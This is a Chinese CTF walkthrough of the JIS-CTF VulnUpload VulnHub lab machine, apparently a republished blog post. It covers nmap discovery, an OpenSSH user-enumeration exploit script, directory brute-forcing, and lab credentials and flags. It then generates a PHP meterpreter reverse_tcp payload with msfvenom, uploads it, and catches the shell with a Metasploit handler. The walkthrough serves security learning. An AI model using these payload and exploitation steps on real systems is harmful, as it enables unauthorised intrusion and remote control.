码迷,mamicode.com
首页 > 其他好文 > 详细

JIS-CTF_VulnUpload靶机

时间:2020-05-07 20:06:30      阅读:89      评论:0      收藏:0      [点我收藏+]

标签:xpl   int   搜索   lin   not   password   name   信息   命令   

仅供个人娱乐

靶机信息

 下载地址:https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/

一、网卡设置

设置为NAT模式,

技术图片
技术图片
技术图片
技术图片

使用vi去修改/etc/network/interface

技术图片

修改保存重启,启动网卡username 3: technawi   password : 3vilH@ksor

技术图片

二、主机探测

nmap -sn 192.168.47.0/24

技术图片

nmap -n -vv -T5 -sn 192.168.47.0/24 | grep -B 1 ‘Host is up‘

技术图片

三、端口扫描

技术图片

JIS 在 22 端口开启了 SSH(OpenSSH 7.2p2)、80 端口开启 HTTP(Apache httpd 2.4.18)等两个服务。另外,操作系统为 ubuntu。这三个信息将成为下个阶段的主要攻击面。

技术图片

cd /usr/share/exploitdb/exploits/linux/remote/

python 40136.py -U ‘/root/user.txt‘ -e 192.168.47.137

技术图片

searchsploit openssh

技术图片

有两个漏洞,依次为本地提权的漏洞、远程命令执行漏洞。

对前者而言,当前没用任何据点(如webshell),还谈不上提权操作,当前只能先放放,后续可能用的上;

对后者来说,利用条件非常严苛,攻击者必须拿到 forwardedagent-socket 的控制权,而且目标必须 SSH 登录攻击者所控制 forwarded agent-socket的那台机器,才可能让目标加载指定 *.so,实现远程命令执行。

技术图片

漏洞为漏洞内存泄漏的漏洞

查看web页面

技术图片

首先查看源码

技术图片
技术图片

dirb http://192.168.47.137

技术图片

通过 engagement tools – discover content,启用子目录枚举功能

技术图片

这里已经知道了后端语言是php,所以就只枚举php文件

技术图片
技术图片

爬取网站

技术图片
技术图片

在sitemap搜索一下flag

技术图片
技术图片

 The 1st flag is : {8734509128730458630012095}

The 2nd flag is : {7412574125871236547895214}

username : admin

password : 3v1l_H@ck3r

技术图片

上传文件

技术图片
技术图片

我们爬到的uploads跟uploaded_files文件夹,去尝试访问

技术图片

msfvenom --payload php/meterpreter/reverse_tcp LHOST=192.168.47.128 LPORT=4444 --format raw --out ./php.php

技术图片

上传木马

技术图片

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload /php/meterpreter/reverse_tcp

se[-] The value specified for payload is not valid.

msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

payload => php/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set Lhost 192.168.47.128

Lhost => 192.168.47.128

msf5 exploit(multi/handler) > set LPORT 4444

LPORT => 4444

msf5 exploit(multi/handler) > run

技术图片
技术图片

信息收集

技术图片

 

技术图片

发现了在technawi的用户目录下有.sudo_as_admin_successful文件,所以我们只要拥有technawi用户,就有root权限

再去找找文件中有没technawi

技术图片

grep -ri --exclude-dir=proc/ ‘technawi‘ / 2> /dev/null

技术图片
技术图片

ssh登录

技术图片

JIS-CTF_VulnUpload靶机

标签:xpl   int   搜索   lin   not   password   name   信息   命令   

原文地址:https://www.cnblogs.com/bingtang123/p/12838383.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!